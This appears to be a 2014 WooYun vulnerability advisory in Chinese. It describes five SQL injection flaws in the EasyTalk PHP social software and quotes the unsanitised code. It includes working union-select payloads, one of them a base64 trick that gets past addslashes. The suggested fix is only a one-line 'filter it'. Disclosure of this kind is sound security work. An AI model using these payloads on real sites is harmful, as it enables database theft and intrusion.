EasyTalk Sql Injection 1-5 | WooYun-2014-50338

漏洞概要关注数(6) 关注此漏洞

缺陷编号： WooYun-2014-50338

漏洞标题： EasyTalk Sql Injection 1-5

漏洞作者： ′雨。

提交时间： 2014-02-09 10:26

公开时间： 2014-05-10 10:27

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 help@wooyun.org

Tags标签：无

2人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-02-09：细节已通知厂商并且等待厂商处理中
2014-02-09：厂商已经确认，细节仅向厂商公开
2014-02-12：细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2014-04-05：细节向核心白帽子及相关领域专家公开
2014-04-15：细节向普通白帽子公开
2014-04-25：细节向实习白帽子公开
2014-05-10：细节向公众公开

简要描述：

过滤不严。

详细说明：

注入1：

在topicaction.class.php中

code 区域

public function topic() {


		$keyword=$this->_get('keyword','urldecode');//无过滤 且解码


		if ($keyword) {


			$topic = D('Topic')->where("topicname='$keyword'")->find();


            if ($topic) {


                $isfollow=D('Mytopic')->isfollow($topic['id'],$this->my['user_id']);


                $topicusers=D('MytopicView')->where("topicid='$topic[id]'")->order('id desc')->limit(9)->select();


				//getwidget


				$widget=M('Topicwidget')->where("topicid='$topic[id]'")->order('`order` ASC')->select();


				if ($widget) {


					foreach ($widget as $val) {


						$topicwidget[$val['widgettype']][]=$val;


					}


				}


				$this->assign('topicwidget',$topicwidget);


            } else {


                $count=$isfollow=0;


            }

$topic = D('Topic')->where("topicname='$keyword'")->find();

这里带入查询。

where topicname='keyword';

SELECT * FROM `et_topic` WHERE topicname='aaa' LIMIT 1

构造一下 aaa' and 1=2 union select 1,2,3,user(),5 %23

完美注入。

注入2：

在settingaction.class.php 中

code 区域

public function doauth() {


        $_authmsg=daddslashes($_GET['auth']);


        $authmsg=base64_decode($_authmsg);


        $tem=explode(":",$authmsg);


        $send_id=$tem[0];


        $user=M('Users');





        $row = $user->field('mailadres,auth_email')->where("user_id='$send_id'")->find();


        if ($_authmsg==$row['auth_email']) {


            $user->where("user_id='$send_id'")->setField('auth_email',1);


            setcookie('setok', json_encode(array('lang'=>L('mail6'),'ico'=>1)),0,'/');


        } else {


            setcookie('setok', json_encode(array('lang'=>L('mail7'),'ico'=>2)),0,'/');


        }


        header('location:'.SITE_URL.'/?m=setting&a=mailauth');


    }

$_authmsg 虽然用addslashes 进行处理后但是后面解码。

所以无视过滤。

然后切割成数组数组的第一个带入查询。

$row = $user->field('mailadres,auth_email')->where("user_id='$send_id'")->find();

where user_id = '$send_id'

完美注入。无视Gpc

首先编码一下然后注入

SELECT `mailadres`,`auth_email` FROM `et_users` WHERE user_id='yu' union select user(),2#' LIMIT 1

$F2)_R}R{VZDIMRLUG3NUO0U.jpg$

完美注入。

注入3：

在messageaction.class.php中。

code 区域

public function show() {


		$uid=$_GET['uid'];





		$mes=M('Messages');





		$count = $mes->where("(senduid='".$this->my['user_id']."' AND sendtouid='$uid') OR (senduid='$uid' AND sendtouid='".$this->my['user_id']."')")->count();


		$p= new Page($count,20);


		$page = $p->show('message/show/uid/'.$uid.'/p/',1,'action-for="stream"');


		$data = D('MessagesView')->where("(senduid='".$this->my['user_id']."' AND sendtouid='$uid') OR (senduid='$uid' AND sendtouid='".$this->my['user_id']."')")->order("message_id DESC")->limit($p->firstRow.','.$p->listRows)->select();

$uid 无过滤直接带入了查询。

$count = $mes->where("(senduid='".$this->my['user_id']."' AND sendtouid='$uid') OR (senduid='$uid' AND sendtouid='".$this->my['user_id']."')")->count();

SELECT COUNT(*) AS tp_count FROM `et_messages` WHERE (senduid='2' AND sendtouid='aaaa' AND sendtouid='2') LIMIT 1

执行的sql 构造一下语句。

有图有真相。

注入4：

在photoaction.class.php中

code 区域

public function show() {


		$cid=$_GET['cid'];


		


		$content=D('ContentView')->where("content_id='$cid' AND FIND_IN_SET('p',filetype)")->find();


		if (!$content) {


			$this->display('nophoto');


			exit;


		}


		


		$cModel=M('Content');


		$count=$cModel->where("user_id='$content[user_id]' AND FIND_IN_SET('p',filetype)")->count();

$cid 无过滤且直接带入了

where("content_id='$cid' AND FIND_IN_SET('p',filetype)")->find();

content_id=$cid

SELECT Content.content_id AS content_id,Content.content_body AS content_body,Content.posttime AS posttime,Content.type AS type,Content.filetype AS filetype,Content.retid AS retid,Content.replyid AS replyid,Content.replytimes AS replytimes,Content.zftimes AS zftimes,Content.pinbi AS pinbi,Content.zhiding AS zhiding,Content.praisetimes AS praisetimes,Plugins.name AS appname,Plugins.directory AS directory,Plugins.available AS available,Plugins.type AS apptype,Users.user_id AS user_id,Users.user_name AS user_name,Users.nickname AS nickname,Users.user_head AS user_head,Users.user_auth AS user_auth,Users.provinceid AS provinceid,Users.cityid AS cityid FROM et_content Content ignore index(replyid) LEFT JOIN et_plugins Plugins ON Content.type=Plugins.directory LEFT JOIN et_users Users ON Content.user_id=Users.user_id WHERE content_id='aaa' AND FIND_IN_SET('p',filetype) LIMIT 1

这个是执行的语句来构造一下语句。

注入成功有图有真相。

注入5：

在appaction.class.php中

code 区域

public function applist() {


		parent::tologin();


		import("@.ORG.Page");


        C('PAGE_NUMBERS',10);


		$pvmodel=D('PluginsView');


		$keyword=trim(htmlspecialchars($_REQUEST['keyword']));





		if (!$keyword) {


			$count=M('Plugins')->where("available=1 AND (type='app' || type='api')")->count();


			$p= new Page($count,20);


			$page = $p->show("?m=app&a=applist&p=");


			$app=$pvmodel->where("available=1 AND (type='app' || type='api')")->order("installs DESC")->limit($p->firstRow.','.$p->listRows)->select();


		} else {


			$count=$pvmodel->where("name LIKE '%$keyword%' AND available=1 AND (type='app' || type='api')")->count();


			$p= new Page($count,20);


			$page = $p->show("?m=app&a=applist&keyword=$keyword&p=");


			$app=$pvmodel->where("name LIKE '%$keyword%' AND available=1 AND (type='app' || type='api')")->order("installs DESC")->limit($p->firstRow.','.$p->listRows)->select();

$KEYWORD为 request 获取的然后html实体但是对注入的影响不大。

如果keyword 为true的话就带入

$count=$pvmodel->where("name LIKE '%$keyword%' AND available=1 AND (type='app' || type='api')")->count();

SELECT COUNT(*) AS tp_count FROM et_plugins Plugins LEFT JOIN et_users Users ON Plugins.appauthor=Users.user_id WHERE name LIKE '%yu%' AND available=1 AND (type='app' || type='api') LIMIT 1

所执行的语句构造一下

注入成功有图有真相

漏洞证明：

修复方案：

过滤呗。

版权声明：转载请注明来源 ′雨。@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2014-02-09 16:33

厂商回复：

正在修复中

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-02-09 11:26 | ′ 雨。 ( 普通白帽子 | Rank:1332 漏洞数:198 | Only Code Never Lie To Me.)
0

@xsser 。我只能说我心碎了。 15个给我弄成了三个合集啊啊。。

1# 回复此人
2014-02-09 19:29 | HackBraid ( 普通白帽子 | Rank:1854 漏洞数:296 | 风暴网络安全空间： http://www.heysec.or...)
0

可以了，刷了那么多…

2# 回复此人
2014-02-09 19:40 | HackBraid ( 普通白帽子 | Rank:1854 漏洞数:296 | 风暴网络安全空间： http://www.heysec.or...)
0

@xsser报告队长，用诺基亚手机的UC浏览器点击洞主的号会跳转到乌云首页

3# 回复此人

登录后才能发表评论，请先登录。

WooYun.org

漏洞概要关注数(6) 关注此漏洞

缺陷编号： WooYun-2014-50338

漏洞标题： EasyTalk Sql Injection 1-5

相关厂商： nextsns.com

漏洞作者： ′雨。

提交时间： 2014-02-09 10:26

公开时间： 2014-05-10 10:27

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 help@wooyun.org

Tags标签：无

2人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 ′雨。@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价):

登陆后才能进行评分

评价

WooYun.org

漏洞概要 关注数(6) 关注此漏洞

缺陷编号： WooYun-2014-50338

漏洞标题： EasyTalk Sql Injection 1-5

相关厂商： nextsns.com

漏洞作者： ′雨。

提交时间： 2014-02-09 10:26

公开时间： 2014-05-10 10:27

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 20

漏洞状态： 厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 help@wooyun.org

Tags标签： 无

2人收藏 收藏 var token=""; var id="50338"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 ′雨。@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

漏洞概要关注数(6) 关注此漏洞

危害等级：高

漏洞状态：厂商已经确认

Tags标签：无

2人收藏收藏
分享漏洞：

漏洞评价(共0人评价):

登陆后才能进行评分